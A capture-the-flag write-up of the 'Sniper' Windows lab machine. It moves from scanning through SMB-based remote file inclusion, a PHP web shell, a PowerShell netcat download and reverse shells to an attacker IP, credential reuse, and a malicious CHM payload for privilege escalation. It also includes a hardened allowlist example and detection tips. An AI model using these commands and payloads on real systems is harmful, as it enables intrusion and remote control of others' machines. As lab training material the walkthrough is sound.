
In this article you will learn the following:
- Scanning targets using nmap
- Enumerating a Windows machine
- RFI via an SMB shared folder
- Switching user via PowerShell
- Exploiting Microsoft Compiled HTML Help (.chm)
Starting with the nmap scan:
nmap -Pn -v -sC -sV -oN sniper.nmap 10.10.10.151
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerating web directories:
gobuster dir -u http://10.10.10.151/ -w /usr/share/wordlists/dirb/common.txt
/blog (Status: 301)
/Blog (Status: 301)
/css (Status: 301)
/Images (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/user (Status: 301)
After enumeration I saw there is a GET parameter, lang, in /blog that loads the page for a specific language:
http://10.10.10.151/blog/?lang=blog-fr.php
It seemed to be an LFI/RFI vulnerability.
I started exploiting it as an LFI with no success, and after an hour of research I found there is
a technique for RFI via an SMB shared folder:
https://medium.com/@minimalist.ascent/remote-file-include-using-samba-shares-6fa76dfeb4ce
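To show why the lang parameter is exploitable through an SMB share and how the page should have been written, here is an added example (not code from the box or from this writeup): on Windows, PHP's include treats a UNC path such as \\host\share\file.php as a plain filesystem path, so allow_url_include=Off does not block it, and only an allowlist of language files does. The file names, keys and function names are assumptions.

```php
<?php
// Added example; not the Sniper box's actual blog code.

// Vulnerable pattern (what /blog/?lang= behaves like): the request value is
// used directly as an include path. On Windows hosts a UNC path such as
// \\10.10.14.43\Shell\cmd.php resolves as a local filesystem path, so the
// allow_url_include=Off setting does not stop it, and ../ traversal gives LFI.
function render_vulnerable(string $lang): void
{
    include $lang;   // e.g. ?lang=blog-fr.php
}

// Hardened form: map the user-supplied value onto a fixed allowlist of
// language files and refuse anything else. No request data ever becomes
// part of the filesystem path.
const LANG_FILES = [
    'en' => 'blog-en.php',   // assumed file names
    'fr' => 'blog-fr.php',
];

function resolve_lang(string $lang): ?string
{
    if (!array_key_exists($lang, LANG_FILES)) {
        return null;         // unknown key: reject, never fall through to include
    }
    return __DIR__ . DIRECTORY_SEPARATOR . LANG_FILES[$lang];
}

function render_hardened(string $lang): void
{
    $path = resolve_lang($lang);
    if ($path === null) {
        http_response_code(400);
        echo 'unsupported language';
        return;
    }
    include $path;
}

// Constructed inputs: a valid key, a UNC share path and a traversal attempt.
// Only the first resolves to a path; the other two return NULL.
var_dump(resolve_lang('fr'));
var_dump(resolve_lang('\\\\10.10.14.43\\Shell\\cmd.php'));
var_dump(resolve_lang('../../../../windows/win.ini'));
```

Detection on the defending side is straightforward with the same logic: any lang value that is not an allowlist key, and in particular one starting with \\ or containing ../, is worth alerting on in the IIS logs.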
Creating an SMB shared folder takes a few steps.
First I edited smb.conf in /etc/samba.
Second, create the share directory and the PHP shell:
$ mkdir Shell
$ chmod -R 777 Shell/
$ touch cmd.php
In cmd.php:
<?php
system($_GET['cmd']);
?>
Then start the smbd and nmbd daemons with:
$ service smbd start
$ service nmbd start
After that, I browsed to my shell through the include and executed the following commands:
$ dir c:\
$ mkdir C:\m
$ powershell.exe -ep bypass -nop -command "iwr -uri http://10.10.14.43/nc64.exe -outfile C:\m\nc64.exe"
$ C:\m\nc64.exe 10.10.14.43 9091 -e powershell.exe
Then I got a reverse shell to the machine.
After some enumeration I found db.php (the database connection string).
There is a weird comment; it seems the password is not for the database user. I got the
users on the machine and tried a credentialed scan against the SMB service with the Chris
user.
They are valid credentials for the Chris user.
In this case I had valid credentials for another user and a reverse shell as iusr, so I decided to
write a script to switch user from iusr to Chris; there is a good way to do this in PowerShell
using PSCredential.
After running the script I got a reverse shell as Chris.
And I got the user flag.
Privilege Escalation:
I ran $ whoami /all to check user permissions and groups.
After some manual enumeration I decided to run the tree command in Chris's folder, and I
found an instructions.chm file in the Downloads folder.
I moved the file to my machine via netcat (in cmd.exe the "<" input redirection works for feeding the file to nc).
And I got the file type: it is MS Windows HtmlHelp Data.
To read .chm files on Linux I used the kchmreader application.
After a few minutes I found another interesting file (notes.txt) in c:\Docs.
After reading this I decided to create a CHM payload and drop it in Docs.
Generating the CHM file:
Download Out-CHM.ps1, then in PowerShell:
$ Import-Module .\Out-CHM.ps1
$ Out-CHM -Payload "C:\m\nc64.exe 10.10.14.43 9098 -e powershell.exe" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
After I generated the .chm payload I uploaded it to the Docs folder, set up a listener, and received a
reverse connection from the machine.
And I got the root flag.
That's all folks, hope you enjoyed this writeup.